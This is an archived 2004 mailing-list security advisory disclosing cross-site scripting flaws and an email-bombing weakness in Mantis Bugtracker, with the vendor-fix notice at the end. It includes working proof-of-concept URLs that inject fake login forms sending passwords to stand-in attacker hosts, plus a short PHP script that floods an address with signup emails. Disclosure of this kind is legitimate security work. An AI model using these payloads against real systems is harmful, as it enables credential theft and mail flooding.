Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple Vulnerabilities in Mantis Bugtracker

from [Jose Antonio] Network Security [Permanent Link]
Subject: Multiple Vulnerabilities in Mantis Bugtracker
Date: 20 Aug 2004 22:26:36 -0000 


--------------------------------------------------------------------------- 
                Multiple vulnerabilities in Mantis 
Bugtracker 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: This year, 2004 :) between June and 
August 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is 
written in the PHP scripting  
language and requires the MySQL database and 
a webserver.  
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Multiple Cross Site Scripting Vulnerabilities : 
 
A1. The first vulnerability that I found is this : You 
can login in anonymously and,  
when do you want to perform a privileged action 
you need to re-login with any valid  
user. The previous URL is passed as the return 
parameter to the login_page.php script.  
This parameter is not correctly sanitized when 
showing/parsing and we can put any  
html/script code that we want. To try the first 
vulnerability copy the following text  
and paste in the location bar of your favourite 
web  browser :  
  
 http://<site-with-mantis-bugtracker>/login_page.php?return=%
22%3E%3Ch1%3EHello!%3C/h1%3E%
3Cform%20action=%
22http://malicious.site.com/script.xxx%22%
3EPlease%20type%20your%20password%20:
%20%3Cinput%20type=%22password%22%
20name=%22your_password%22%3E%3Cbr%
3E%3Cinput%20type=%22submit%22%
20value=%22Give%20me%20your%
20password,%20please...%22%3E%3C/form%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr 
 
A2. Register New User Xss Vulnerability 
 
 -The second XSS problem is in the script 
signup.php (for example, 
http://bugs.mantisbt.org/signup.php). [^] This 
scripts registers 
 a new user. The problem is that the script's 
doesn't sanitize properly the passed e-mail 
when showing/parsing. Now, we have  
 the second XSS problem that I found. To test it, 
please follow these steps :  
  
     - Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
[^] 
     - In the username field type any username 
that you want 
     - In the e-mail field type this text : <iframe 
src=http://www.playboy.com></iframe> or 
<h1>Hi!</h1> 
 
A3. Select Project XSS Vulnerability 
 ------------------------------------ 
  
 -I will no explicate the problem because is the 
same all times. Try the following URL please :  
  
 http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%
3Cbr%3E%3Cform%20action=%
22http://my.fucking.site/xxx.sss%22%3E%
3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%
3C/td%3E%3Ctd%3E%3Cinput%20type=text%
20name=user%3E%3C/tr%3E%3Ctr%3E%
3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%
3Cinput%20type=password%20name=pass%
3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%
20colspan=2%3E%3Cinput%20type=submit%
20%20value=%22login%22%20onclick=%
22javascript:alert('hi')%22%3E%3C/td%3E%
3C/tr%3E%3C/form%3E     
  
A4. An other XSS Vulnerability  
 
 - Try the following URL :  
  
  
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80&lt;script&gt;alert('hi')&lt;/script&gt;
 
 
---------------------------------------------- 
 
 
B. Possible E-Mail Bomber. 
 
 - That's fun! We can create a simple program to 
send too many e-mails to the same e-mail 
address by simply changing the username.  
  
 For example : 
  
 1.-Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
 2.- In the username field type test0 
 3.- In the e-mail type test@test.com 
 4.- Send it. 
  
 1.-Navigate to 
http://<site-with-mantis-bugtracker>/signup_page.php 
 2.- In the username field type test1 
 3.- In the e-mail type test@test.com 
 4.- Send it. 
 
If do you want to try the problem you can use the 
following simple script :  
 
====================================================================== 
 
mantis-email-bomber.php 
 
<?php 
 
//Please, change it becuase is my e-mail :) 
$email = "anyemail@address"; 
$base_user = "test"; 
$i = 0; 
$site = "http://<site-with-mantis-bugtracker"; 
 
for ($i=0;$i<=15;$i++) 
{ 
        echo("Sending e-mail number $i\n"); 
        $user = "$base_user$i"; 
        echo("New user is $user\n"); 
        $url = 
"http://$site/signup.php?username=$user&email=$email";; 
        echo("URL is $url\n"); 
        $fd = fopen($url,"r"); 
        echo("E-mail $i sended\n");              
        fclose($fd); 
} 
 
?> 
 
====================================================================== 
 
--------------------------------------------------------------------------- 
 
The fix: 
~~~~~~~~ 
 
Vendor is contacted and all the bugs are 
correcteds in the CVS version at 
sourceforge.net site. 
 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
        Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple Vulnerabilities in Mantis Bugtracker, Jose Antonio <=
Previous by Date:  Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers, morning_wood
Next by Date:  Cross Site Scripting Vulnerability in Sympa, Jose Antonio
Previous by Thread:  EXPLOIT: Qt bmp heap overflow, infamous41md
Next by Thread:  Cross Site Scripting Vulnerability in Sympa, Jose Antonio
Indexes:  [Date] [Thread] [Top] [All Lists]